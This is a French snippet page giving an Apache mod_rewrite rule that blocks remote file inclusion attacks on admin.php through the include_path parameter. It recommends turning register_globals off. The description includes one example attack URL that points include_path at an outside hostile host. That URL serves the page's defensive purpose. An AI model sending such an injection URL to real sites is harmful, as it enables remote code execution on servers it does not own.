Bouts de Codes

Se protéger du hacking avec admin.php et include_path

Information sur le code source

Enregistré le 09 Juin 2008 - Vu 7020 fois
Code source zippé: télécharger le zip
Impression: imprimer le code
  • Sociale bookmarking: Digg ce code sur digg.com
  • Bookmark ce code sur del.icio.us
  • Partage ce code sur Facebook
  • Bookmark ce code sur Google
  • Bookmark ce code sur Yahoo
  • Ajoute Se protéger du hacking avec admin.php et include_path
Votre avis: 
 
Ecrit par :  admin
[66] sources en Apache voir
 

Description du code source

Informations sur le code source

Vous pouvez être victime d'un hacker qui utilise l'inclusion de fichier distant pour exécuter le code qu'il veut sur votre serveur. Le paramètre include_path permet de préfixer le chemin des fichiers passé comme paramètre de la fonction include. Cette faille ne concerne que les site dont le paramètre register globals est à on. Pour vous protéger il suffit de retourner un code retour 403 à chaque accès dangereux.
Les url en question sont sous la forme :
http://www.example.com/admin.php?include_path=http://sitepourri.com/page.txt?

La meilleur protection reste de mettre register globals à off.

Code Source



.01
.02
.03
.04
.05
.06
.07
.08
.09
.10
.11
.12
.13
.14
.15
.16
.17
.18
.19
.20
.21
.22
.23
 

################################################################################
#                                                                              #
#                         __                   _ __  _                         #
#               __ ______/ /______ _    ______(_) /_(_)__  ___ _               #
#              / // / __/ / __/ -_) |/|/ / __/ / __/ / _ \/ _ `/               #
#              \_,_/_/ /_/_/  \__/|__,__/_/ /_/\__/_/_//_/\_, /                #
#                                                        /___/                 #
#                                                                              #
#                                                                              #
################################################################################
#                                                                              #
# Titre          : Se protéger du hacking avec admin.php et include_path       #
#                                                                              #
# URL            : http://www.urlrewriting.fr/scripts56-Apache.htm             #
# Auteur         : admin                                                       #
# Date édition   : 09 Juin 2008                                                #
#                                                                              #
################################################################################

RewriteCond %{QUERY_STRING} ^(.*&)?include_path=http://
RewriteRule ^(.+/)?admin\.php - [F,L]

Ajouter un commentaire

RSS
snippets


RSS
commentaires

 
Code de sécurité

Attention: Les champs marqués d'une étoile * sont obligatoires
Librairie

Langages de programmation

La librairie est ouverte à tous et elle est accès principalement sur les langages Snippets. Vous trouverez aussi d'autres langages de programmation tel que le CSS, HTML, AJAX, ASP.. Plus de 300 références facilement accessibles. Visiter

  • Serveurs LAMP : Administration de la plate-forme Web
  • Apache (version 2) : Installation, administration et sécurisation
  • Montez votre serveur de A à Z
  • Apache : La Référence
  • PHP 5.2 et APACHE 2 - Maîtrisez le développement et le déploiement de votre site web interactif [Nouvelle version]
  • Apache Tomcat 5 : Serveur d'application Java ; Administration sous Windows ou Linux
  • Apache en action
  • LAMP (Linux, Apache, MySQL, PHP) - Coffret de 4 livres : Maîtrisez vos applications Web Open Source [Nouvelles versions]
  • LAMP (Linux, Apache, MySQL, PHP) Pack 4 volumes : Maîtrisez vos applications Web en Open Source
  • Apache 2.0 : Guide de l'administrateur Linux